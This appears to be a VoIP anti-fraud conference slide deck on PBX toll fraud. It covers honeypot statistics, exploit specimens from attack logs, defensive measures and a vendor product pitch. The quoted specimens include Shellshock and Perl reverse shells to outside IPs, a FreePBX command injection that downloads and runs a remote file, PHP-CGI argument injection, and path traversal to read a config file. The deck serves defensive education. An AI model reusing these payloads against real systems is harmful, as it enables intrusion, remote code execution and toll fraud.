No More Fraud!Let’s say “enough is enough”

About meFlavio E. Goncalves

CTO of SipPulse (www.sippulse.com)

Turnkey solutions for VoIP providers and Telcos.

Anti-Fraud Solutions

Why you should care?

Exposure for a single T1 line43200 min/month, US$5/min, 23 lines

US$ 4.968.000

Why they are doing?

#1 Allocate a number and a recording in a PRN provider

#2 Find a vulnerable deviceUsing shodan

#3 Make callsand cash your money

INTELLIGENCE GRABBED IN HONEYPOTS

Distribution by country

117636

105603

78656

32795

11910 11120 10702 3736 2836 1978

US FR DE PS RU TW SC SG GB CA

TOP Prefixes

+972 Palestine

+44 Great Britain

+86 China

+20 Egypt

TOP 5 PBX Exploits in September/October

1. Shellshock

2. PHP/LAMP Injection

3. SQL injection in Trixbox

4. Linksys remote code execution

5. FreePBX Remote Code Execution

#1 Shellshock

• Exploit Date: 09/2014

Specimen:

• [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"

• [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"

#2 SQL injection in Trixbox

• Exploit Date: 03/2014 - http://www.exploit-db.com/exploits/32239/

Specimen:

• [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"

#3 Linksys Remote Code Execution

• Exploit Date: 02/2014 - http://www.exploit-db.com/exploits/31683/

Specimen:

• [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"

#4 LAMP Attacks• Apache/PHP Remote Exploit

• Exploit date 10/2013

• Especimen:

• POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

• [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25“

#5 CallMeNum (Demo)

• Exploit date: 03/2012

• Specimen:

• GET /recordings/misc/callme_page.php?action=c&callmenum=888@ext-featurecodes/n

• Application: system

• Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,“x.y.z.w:4446"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\ncmp\n"); system$_ while<>;'

Unknown Exploits

• Jul/2014

• Specimen:[03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php[03/Jul/2014] "GET /fuxkkk.php[03/Jul/2014] "GET /recordings/theme/alexpass.php

Still uncommon

• MANAGER PORT - 5038

• H323 - 1720

• MGCP – 5036

• TFTP – 69

• IAX2 - 4569

How hackers are getting into your PBX

• #1 – Sip Brute Force (Fail2ban is effective)

• #2 – Http Exploitation

• #3 – Attacks to phones

• #4 – Caller ID Spoofing

• #5 – Billing/Credit card frauds

Part – III How to defend

#1 Patching Everything and Upgrade frequently

#2 Use a Firewall

#3 Use a Session Border Controller

#4 Use Encryption

#5 Use an Anti-Fraud System

#1 Patch Everything, update frequently

•Effectiveness: Low

•Risk: High

•Cost: High

#2 Use a Firewall or configure properly IP tables

•Effectiveness: High

•Risk: Medium

•Cost: Low

•Absolutely a must do. At least, no Internet access to SSH, no Internet access to HTTP/HTTPS.

•No prevention for phones attacks

#3 Use a Session Border Controller

•Effectiveness: Medium

•Risk: Medium

•Cost: Very High

#4 Use encryption

•Effectiveness: Medium

•Risk: Medium

•Cost: High if you intend to do mutual authentication

#5 Use an AntiFraud System

• Effectiveness: High

• Risk: Very Low

• Cost: Medium

• Comments: Can detect 99.999% of the attacks, It prevents against caller ID spoofing, Social Engineering and Phone Attacks.

• Limitations: Firewall restrictions are required to avoid tampering the anti-fraud rules.

Working Together in 2 steps

1. Make sure your customer’s firewall and fail2ban is configured right (You)

2. Partner with us to use TFPS on your customers (Us)

Fraud Prevention for All

www.tfps.co

How effective it is an Anti-Fraud Solution

•99.989% just by protocol signature.

•Number obtained comparing the attacks registered on the honeypot against rules.

Anti-Fraud Effectiveness

Detected Undetected

1. 99.89% of the attacks prevented by signature detection

2. Collaborative protection. One PBX hacked automatically blocks the IP for the others

3. Mechanism, SIP Redirect•No additional hardware required.

•Available for OpenSIPS/Freeswitch/Asterisk

www.tfps.co || tfps.sippulse.com

Asterisk Code[from-internal] ; Set there the context for your users;FPS for International Callsexten=_011[1-9].,1,set(ip=${CHANNEL(recvip)})same=>n,SIPAddHeader(P-Received: ${ip})same=>n,set(ua=${CHANNEL(useragent)})same=>n,SIPAddHeader(P-UA: ${ua})same=>n,set(GROUP()=fps)same=>n,set(ncalls=${GROUP_COUNT(fps)})same=>n,SIPAddHeader(P-Calls: ${ncalls})same=>n,set(_original=${EXTEN})same=>n,dial(SIP/fps/${EXTEN:2})

Asterisk Code[fps];For calls not approvedexten=_R.,1,Answer()same=>n,playback(unauthorized); (Customize here to generate an error message)same=>n,hangup(21);For calls approvedexten=_A.,1,Answer()same=>n,Dial(SIP/provider/${original});(Customize here to send the call ahead)same=>n,hangup(16)

Beyond blacklists,

Comparing to other anti-fraud solutions!

• Pluggable

• No Additional Hardware

• Small traffic to be analyzed

• Small risk, only a few calls can be affected.

• Easy handling of outages

ANTI-FRAUD, HOW-TO (DEMO)

Thank You!

• e-mail: flavio@sippulse.com

• skype: flaviogoncalves1

• Twitter: @asteriskguide

• blog.tfps.co

Backup Slides

#6 FreePBX 2.x Code Execution

• Specimen:

• [03/Jul/2014:17:28:41 +0000] "GET

• /admin/config.php?display=auth&handler=api&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://93.170.130.201:3003/e;perl%20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"

#4 VTIGER Exploit (Lots of variations)

• 0001189: Vtiger CRM - php inject vulnerability

• Specimen

• 108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-“

• 93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=savewordtemplate HTTP/1.1" 404 537 "-" "-"

#4 PHP Code Injection Vulnerability

• Specimen:

• [03/Jul/2014:13:57:37 +0000] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%2293.170.130.201%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534 "-" "-“

• "GET /admin/footer.php?php=info&ip=perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\nunk\n"); system$_ while<>;'

#9 FreePBX Extension Dump Exploitation

• Specimen:

• 184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST /admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC&current_page=0/admin/cdr/call-comp.php HTTP/1.1" 404 484 "-" "-"

#6 Freeswitch Attacks

GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df-df&template=linksys

#4 Caller ID Spoofing

• 1 - Send 1 million calls and cancel

• 2 - Fake the callerID to a PRN

• 3 - Wait for the call back.

Open Source is a Target!

•We are seeing scans for:

• Vicidial

• Astpp

• phpMyAdmin (hot)

• Tomcat

• Jboss

• FreeSwitch

First way to protect

1.Make sure your system is protected by a firewall1. Vulnerability SCAN

2. Apply firewall rules to prevent unauthorized access to the server

3. Use .htaccess and implement dual authentication

# 5 SIP Phone Recent Vulnerabilities

• Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/ (10)

• Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014-3313/ (4.3)

• Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014-3312/ (6.9)

• Yealink - http://www.cvedetails.com/cve/CVE-2014-3427

• Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/